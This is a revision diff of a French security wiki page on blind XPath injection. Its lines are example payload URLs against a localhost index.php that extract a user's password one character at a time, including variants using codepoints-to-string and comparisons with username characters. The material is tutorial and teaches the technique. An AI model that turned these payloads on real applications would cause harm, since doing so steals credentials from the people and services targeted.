Différences

Ci-dessous, les différences entre deux révisions de la page.

--- web:injection_blind_xpath [2016/02/04 17:04]
arkinar créée
+++ web:injection_blind_xpath [2016/02/16 16:02]
arkinar
@@ Ligne 57: / Ligne 57: @@
 <code>
-http://localhost/index.php?userid=1 and substring(user[1]/password,1,1)='a'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,1,1)='a'
-http://localhost/index.php?userid=1 and substring(user[1]/password,1,1)='b'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,1,1)='b'
-http://localhost/index.php?userid=1 and substring(user[1]/password,1,1)='c'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,1,1)='c'
-http://localhost/index.php?userid=1 and substring(user[1]/password,1,1)='d'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,1,1)='d'
-http://localhost/index.php?userid=1 and substring(user[1]/password,1,1)='e'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,1,1)='e'
 ...
-http://localhost/index.php?userid=1 and substring(user[1]/password,1,1)='p'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,1,1)='p'
 </code>
@@ Ligne 73: / Ligne 73: @@
 <code>
-http://localhost/index.php?userid=1 and substring(user[1]/password,2,1)='a'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,2,1)='a'
-http://localhost/index.php?userid=1 and substring(user[1]/password,2,1)='b'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,2,1)='b'
-http://localhost/index.php?userid=1 and substring(user[1]/password,2,1)='c'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,2,1)='c'
-http://localhost/index.php?userid=1 and substring(user[1]/password,2,1)='d'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,2,1)='d'
-http://localhost/index.php?userid=1 and substring(user[1]/password,2,1)='e'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,2,1)='e'
 ...
-http://localhost/index.php?userid=1 and substring(user[1]/password,2,1)='A' <=OK
+http://localhost/index.php?userid=1 and substring(//user[1]/password,2,1)='A' <=OK
 </code>
@@ Ligne 85: / Ligne 85: @@
 <code>
-http://localhost/index.php?userid=1 and substring(user[1]/password,3,1)='a'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,3,1)='a'
-http://localhost/index.php?userid=1 and substring(user[1]/password,3,1)='b'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,3,1)='b'
-http://localhost/index.php?userid=1 and substring(user[1]/password,3,1)='c'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,3,1)='c'
-http://localhost/index.php?userid=1 and substring(user[1]/password,3,1)='d'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,3,1)='d'
-http://localhost/index.php?userid=1 and substring(user[1]/password,3,1)='e'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,3,1)='e'
 ...
-http://localhost/index.php?userid=1 and substring(user[1]/password,3,1)='S' <=OK
+http://localhost/index.php?userid=1 and substring(//user[1]/password,3,1)='S' <=OK
 </code>
@@ Ligne 97: / Ligne 97: @@
 <code>
-http://localhost/index.php?userid=1 and substring(user[1]/password,4,1)='a'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,4,1)='a'
-http://localhost/index.php?userid=1 and substring(user[1]/password,4,1)='b'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,4,1)='b'
-http://localhost/index.php?userid=1 and substring(user[1]/password,4,1)='c'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,4,1)='c'
-http://localhost/index.php?userid=1 and substring(user[1]/password,4,1)='d'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,4,1)='d'
-http://localhost/index.php?userid=1 and substring(user[1]/password,4,1)='e'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,4,1)='e'
 ...
-http://localhost/index.php?userid=1 and substring(user[1]/password,4,1)='p'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,4,1)='p'
 </code>
@@ Ligne 122: / Ligne 122: @@
 <code>
-http://localhost/index.php?userid=1 and substring(user[1]/password,1,1)=codepoints-to-string(112)
+http://localhost/index.php?userid=1 and substring(//user[1]/password,1,1)=codepoints-to-string(112)
 </code>
@@ Ligne 128: / Ligne 128: @@
 <code>
-http://localhost/index.php?userid=1 and substring(user[1]/password,1,1)='p'
+http://localhost/index.php?userid=1 and substring(//user[1]/password,1,1)='p'
 </code>
@@ Ligne 140: / Ligne 140: @@
 <code>
-http://localhost/index.php?userid=1 and substring(user[1]/password,1,1)=substring(user[1]/username,1,1)
+http://localhost/index.php?userid=1 and substring(//user[1]/password,1,1)=substring(//user[1]/username,1,1)
 </code>
@@ Ligne 148: / Ligne 148: @@
 <code>
-http://localhost/index.php?userid=1 and substring(user[1]/password,1,1)=substring(user[4]/username,3,1)     <= p
+http://localhost/index.php?userid=1 and substring(//user[1]/password,1,1)=substring(//user[4]/username,3,1)     <= p
-http://localhost/index.php?userid=1 and substring(user[1]/password,2,1)=substring(user[1]/username,1,1)     <= A
+http://localhost/index.php?userid=1 and substring(//user[1]/password,2,1)=substring(//user[1]/username,1,1)     <= A
-http://localhost/index.php?userid=1 and substring(user[1]/password,3,1)=substring(user[4]/username,1,1)     <= S
+http://localhost/index.php?userid=1 and substring(//user[1]/password,3,1)=substring(//user[4]/username,1,1)     <= S
-http://localhost/index.php?userid=1 and substring(user[1]/password,4,1)=substring(user[4]/username,1,1)     <= S
+http://localhost/index.php?userid=1 and substring(//user[1]/password,4,1)=substring(//user[4]/username,1,1)     <= S
 </code>

Wiki sécurité informatique

Outils pour utilisateurs

Outils du site

Différences

Outils de la page